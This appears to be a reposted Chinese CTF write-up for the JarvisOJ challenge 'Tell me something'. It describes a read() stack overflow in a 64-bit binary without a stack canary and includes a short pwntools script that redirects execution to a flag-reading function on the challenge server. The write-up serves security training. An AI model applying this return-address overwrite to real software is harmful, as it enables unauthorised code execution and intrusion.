[Jarvisos]Tell me something
2021-04-09 10:27
标签:python 输出 读取 SOS eth system函数 没有 flag RoCE 拿到题目首先检查一下是32位还是64位 64位程序,未开启canary栈保护 运行一下程序,检查一下程序的运行逻辑 提示—>输入—>输出 ida反编译一下,看一下代码逻辑是什么 发现read函数在向v6读入输入的时候没有判断v6接受参数的大小范围,而超出了v6所能接受的最大范围,存在溢出 到这里整体思路已经有了,就是利用这里的read函数的栈溢出进行漏洞利用 那么我这个时候首先是去找有没有system函数来调用shell,找了一圈发现没有,最终发现了一个有意思的函数 调用这个函数的时候,会直接对flag.txt进行读取,所以我们只需要将溢出后的地址覆盖到这里就行 exp: 这里说一下踩到的坑,刚开始调试程序是在本地调试程序,发现一直不成功,后来发现其实这里得不到shell,而是直接读取的文件从而获得flag,所以这里程序要想本地调试成功,需要在当前目录下创建flag.txt文件才可以 [Jarvisos]Tell me something 标签:python 输出 读取 SOS eth system函数 没有 flag RoCE 原文地址:https://www.cnblogs.com/Jleixin/p/13375195.html0x01
0x02
0x03
from pwn import *
debug = 0
if debug == 1:
io = process("./guestbook.d3d5869bd6fb04dd35b29c67426c0f05")
elf = ELF("./guestbook.d3d5869bd6fb04dd35b29c67426c0f05")
else:
io = remote("pwn.jarvisoj.com", 9876)
elf = ELF("./guestbook.d3d5869bd6fb04dd35b29c67426c0f05")
good_game_addr = elf.symbols["good_game"]
io.recvline()
payload = b‘a‘ * 0x88 + p64(good_game_addr)
io.sendline(payload)
io.interactive()
上一篇:码迷,mamicode.com!
下一篇:子集枚举的二进制算法